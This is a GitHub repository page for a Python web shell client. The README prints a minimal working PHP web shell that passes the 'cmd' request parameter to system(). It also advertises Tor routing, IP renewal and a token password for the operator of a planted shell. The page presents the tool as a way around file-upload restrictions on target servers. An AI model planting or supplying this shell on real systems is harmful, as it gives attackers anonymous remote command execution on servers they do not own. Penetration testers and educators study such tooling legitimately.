Skip to content

tchar/webshell-client

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Webshell client

A webshell client written in python.

Only works well for linux for the time being.

Why?

Because there are too many heavy webshells. Sometimes there are restrictions in the file upload and heavy webshells won't work. By having a simple webshell and emulating from the client you can have a full featured webshell by having a remote shell like:

<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>

Features

  • Supports POST/GET requests
  • Supports token-password so that you can loosely protect from others performing requests on your webshell
  • Supports the tor service and the tor-control service
    • Perform requests behind tor
    • Renew IP using the tor-control service
  • Configuration file
  • Command history
  • File upload

Configuration

To be documented

About

A web shell client written in python.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published